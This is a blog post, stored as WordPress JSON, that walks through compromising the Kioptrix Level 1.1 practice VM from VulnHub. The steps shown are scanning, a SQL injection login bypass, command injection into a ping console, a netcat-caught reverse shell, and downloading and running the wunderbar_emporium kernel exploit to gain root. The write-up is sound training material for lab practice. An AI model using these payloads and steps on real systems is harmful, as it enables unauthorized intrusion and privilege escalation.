{"id":199,"date":"2018-01-09T22:40:25","date_gmt":"2018-01-10T03:40:25","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=199"},"modified":"2019-08-28T10:31:19","modified_gmt":"2019-08-28T14:31:19","slug":"kioptrix-level-1-1-2-walkthrough","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/kioptrix-level-1-1-2-walkthrough\/","title":{"rendered":"Kioptrix Level 1.1 (#2) Walkthrough"},"content":{"rendered":"

This is the second VM in the Kioptrix series of vulnerable VMs. You can get it from VulnHub<\/a>.<\/p>\n

Scanning<\/h1>\n

First, let’s find the host:<\/p>\n

root ~ # netdiscover -i eth1 -r 10.10.1.0\/24\r\n __________________________________________________________________________\r\n IP At MAC Address Count Len MAC Vendor \/ Hostname \r\n --------------------------------------------------------------------------\r\n 10.10.1.1 00:50:56:c0:00:01 1 60 VMware, Inc. \r\n 10.10.1.22 00:0c:29:53:19:4c 1 60 VMware, Inc.<\/pre>\n

Now let’s nmap scan it (I’ve cut out a bunch of irrelevant lines):<\/p>\n
root ~ # nmap -sV -O 10.10.1.22\r\nPORT STATE SERVICE VERSION\r\n22\/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)\r\n80\/tcp open http Apache httpd 2.0.52 ((CentOS))\r\n111\/tcp open rpcbind 2 (RPC #100000)\r\n443\/tcp open ssl\/http Apache httpd 2.0.52 ((CentOS))\r\n631\/tcp open ipp CUPS 1.1\r\n3306\/tcp open mysql MySQL (unauthorized)\r\nOS details: Linux 2.6.9 - 2.6.30<\/pre>\n

Enumeration<\/h1>\n
Doing a bit of research shows that\u00a0OpenSSH 3.9p1 & Apache 2.0.52 were released in 2004 and CUPS 1.1 was released in 2000. This VM released in 2011. I might need to look for vulnerabilities in some of these services. For now, I’m going to check the website. It appears to just be a login page:<\/p>\n
\"\"<\/p>\n
Port 443 is also open but the HTTPS page is exactly the same. First, I’ll run dirb to see if there are any other easy to find pages that might be of interest:<\/p>\n
root ~ # dirb http:\/\/10.10.1.22\/\r\n ---- Scanning URL: http:\/\/10.10.1.22\/ ----\r\n + http:\/\/10.10.1.22\/cgi-bin\/ (CODE:403|SIZE:286)\r\n + http:\/\/10.10.1.22\/index.php (CODE:200|SIZE:667)\r\n ==> DIRECTORY: http:\/\/10.10.1.22\/manual\/\r\n + http:\/\/10.10.1.22\/usage (CODE:403|SIZE:283)<\/pre>\n

Nothing good. The \/manual\/ directory is just the Apache manual.<\/p>\n
Exploitation<\/h1>\n
The next thing that comes to mind is to try some SQL Injection. After spending some on this, I finally found something that worked. The username can be anything while using this for the password:<\/p>\n
' or '1'='1<\/pre>\n

That takes you to this “Basic Administrative Web Console” that lets you ping another machine on the network.<\/p>\n
\"\"<\/p>\n
This has ‘command injection’ written all over it… I’ll end the ping command with a semicolon (;) and do something simple like pwd to see if this works.<\/p>\n
\"\"
\n\"\"<\/p>\n
Great! Now, using PentestMonkey’s Reverse Shell Cheat Sheet<\/a>, I’ll try to get a reverse shell strait from Bash:<\/p>\n
\"\"<\/p>\n
root ~ # nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n10.10.1.22: inverse host lookup failed: Unknown host\r\nconnect to [10.10.1.2] from (UNKNOWN) [10.10.1.22] 32769\r\nbash: no job control in this shell\r\nbash-3.00$<\/pre>\n

Privilege Escalation<\/h1>\n
That was easy… Let’s see if we can get root privileges. First, I get the kernel version.<\/p>\n
bash-3.00$ uname -a\r\nLinux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU\/Linux<\/pre>\n

Now, using my favorite place to check for kernel exploits<\/a>, I just used Ctrl+F to search for “2.6.9” and found several possibilities. I’ll spare all the trials & errors I went through to find one that worked. Go to the “sock_sendpage” exploit & follow the link to Exploit-db<\/a>. There’s a link there to download wunderbar_emporium.tgz. I downloaded this to my Kali VM and started a web server to transfer it to the Kioptrix 2 VM.<\/p>\n
root ~ # wget https:\/\/github.com\/offensive-security\/exploit-database-bin-sploits\/raw\/master\/bin-sploits\/9435.tgz\r\n2018-01-09 21:32:41 (384 KB\/s) - \u20189435.tgz\u2019 saved [3492015\/3492015]\r\n\r\nroot ~ # python -m SimpleHTTPServer 80\r\nServing HTTP on 0.0.0.0 port 80 ...<\/pre>\n

Now I can download & run it on the Kioptrix 2 VM.<\/p>\n
bash-3.00$ cd \/tmp\r\nbash-3.00$ wget http:\/\/10.10.1.2\/wunderbar_emporium.tgz\r\n--22:23:57--  http:\/\/10.10.1.2\/wunderbar_emporium.tgz\r\n           => `wunderbar_emporium.tgz'\r\nConnecting to 10.10.1.2:80... connected.\r\nHTTP request sent, awaiting response... 200 OK\r\nLength: 3,492,015 (3.3M) [application\/x-gtar-compressed]\r\n\r\n22:23:57 (84.85 MB\/s) - `wunderbar_emporium.tgz' saved [3492015\/3492015]\r\n\r\nbash-3.00$ ls\r\nwunderbar_emporium.tgz\r\nbash-3.00$ tar zxf wunderbar_emporium.tgz\r\nbash-3.00$ ls\r\nwunderbar_emporium\r\nwunderbar_emporium.tgz\r\nbash-3.00$ cd wunderbar_emporium    \r\nbash-3.00$ ls\r\nexploit.c\r\npwnkernel.c\r\ntzameti.avi\r\nwunderbar_emporium.sh\r\nbash-3.00$ chmod +x wunderbar_emporium.sh \r\nbash-3.00$ ls\r\nexploit.c\r\npwnkernel.c\r\ntzameti.avi\r\nwunderbar_emporium.sh\r\nbash-3.00$ .\/wunderbar_emporium.sh \r\nsh: mplayer: command not found\r\nsh: no job control in this shell\r\nsh-3.00# id\r\nuid=0(root) gid=0(root) groups=48(apache)<\/pre>\n

Great success!<\/p>\n","protected":false},"excerpt":{"rendered":"
This is the second VM in the Kioptrix series of vulnerable VMs. You can get it from VulnHub. Scanning First, let’s find the host: root ~ # netdiscover -i eth1Continue readingKioptrix Level 1.1 (#2) Walkthrough<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-199","post","type-post","status-publish","format-standard","hentry","category-vulnhub"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=199"}],"version-history":[{"count":20,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/199\/revisions"}],"predecessor-version":[{"id":227,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/199\/revisions\/227"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=199"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=199"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}